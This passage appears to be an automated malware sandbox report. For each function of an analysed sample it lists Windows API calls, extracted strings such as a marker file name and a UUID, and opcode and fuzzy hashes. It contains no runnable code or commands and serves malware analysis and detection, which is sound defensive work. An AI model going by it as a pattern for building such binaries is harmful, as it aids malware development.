                                                                                                • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                                                                                • DispatchMessageW.USER32(?), ref: 0041FE2B
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                                                                                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 1380987712-0
                                                                                                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                                • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
                                                                                                • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                • Opcode Fuzzy Hash: 3e8e620cdafad959620aa8092266a2dd437b35ec9cc4a24f81571b5e96538b17
                                                                                                • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                • String ID: A
                                                                                                • API String ID: 3115901604-2078354741
                                                                                                • Opcode ID: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                • Instruction ID: 74c924880168de559db59c14e1a2c39f6381d3f38157317aef41ba5f0430eaff
                                                                                                • Opcode Fuzzy Hash: d1228be24c2bcabe2754a9de32c20230a63627f67e8be6dccc8404be8c77e6ea
                                                                                                • Instruction Fuzzy Hash: F041F870700626BFDB289F69EA8056F77A5BF44360B94813FE805C7740D6F8DD818B58
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
                                                                                                • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                • Opcode Fuzzy Hash: 749c0c363911c6b197ced0573a154d5961979834c741efb9d592a9087351605d
                                                                                                • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                • API String ID: 2102423945-2013712220
                                                                                                • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                APIs
                                                                                                • UuidCreate.RPCRT4(?), ref: 0040C5DA
                                                                                                • UuidToStringA.RPCRT4(?,00000000), ref: 0040C5F6
                                                                                                • RpcStringFreeA.RPCRT4(00000000), ref: 0040C640
                                                                                                Strings
                                                                                                • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: StringUuid$CreateFree
                                                                                                • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                • API String ID: 3044360575-2335240114
                                                                                                • Opcode ID: f368a6ffb16046697342e4746a0b21291bac470e9a8aaf6bc929c7402f94eed5
                                                                                                • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                • Opcode Fuzzy Hash: f368a6ffb16046697342e4746a0b21291bac470e9a8aaf6bc929c7402f94eed5
                                                                                                • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                APIs
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$AppendFolder
                                                                                                • String ID: bowsakkdestx.txt
                                                                                                • API String ID: 29327785-2616962270
                                                                                                • Opcode ID: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                                                                                                • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                • Opcode Fuzzy Hash: 23fc771ccd0fb84302ef14e270554964de1445af84905d4ed2fddc0fcc519b49
                                                                                                • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                APIs
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ClassCursorLoadRegister
                                                                                                • String ID: 0$LPCWSTRszWindowClass
                                                                                                • API String ID: 1693014935-1496217519
                                                                                                • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                APIs
                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path$AppendDeleteFileFolder
                                                                                                • String ID: bowsakkdestx.txt
                                                                                                • API String ID: 610490371-2616962270
                                                                                                • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove_strtok
                                                                                                • String ID:
                                                                                                • API String ID: 3446180046-0
                                                                                                • Opcode ID: f45f107c7619ba89dcc337b3fde2fe8cba8a3772eceece06fe5d0b8309d58b40
                                                                                                • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                • Opcode Fuzzy Hash: f45f107c7619ba89dcc337b3fde2fe8cba8a3772eceece06fe5d0b8309d58b40
                                                                                                • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 2974526305-0
                                                                                                • Opcode ID: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
                                                                                                • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                • Opcode Fuzzy Hash: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
                                                                                                • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C709
                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,0043C0ED,?,00BFBBEF,00000003), ref: 0043C73F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
                                                                                                • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                • Opcode Fuzzy Hash: 545b86b4f69abcc520aee3959e2c1e78f1be635744476d2f07a63b5a2a38a0c0
                                                                                                • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                  • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                  • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 2901542994-0
                                                                                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                • _malloc.LIBCMT ref: 004127C3
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                • _memset.LIBCMT ref: 004127CE
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 2824100046-0
                                                                                                • Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                • Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32 ref: 00412806
                                                                                                • _malloc.LIBCMT ref: 00412814
                                                                                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                                                                                                • _memset.LIBCMT ref: 0041281F
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 2824100046-0
                                                                                                • Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                • Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
                                                                                                • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                • Opcode Fuzzy Hash: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
                                                                                                • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: .\crypto\asn1\tasn_new.c
                                                                                                • API String ID: 2102423945-2878120539
                                                                                                • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 4104443479-4289949731
                                                                                                • Opcode ID: 7df1e10ad76e29fab8b9693ecc8e3a17a06a76cc108172ebea4210ab36e9a770
                                                                                                • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                • Opcode Fuzzy Hash: 7df1e10ad76e29fab8b9693ecc8e3a17a06a76cc108172ebea4210ab36e9a770
                                                                                                • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
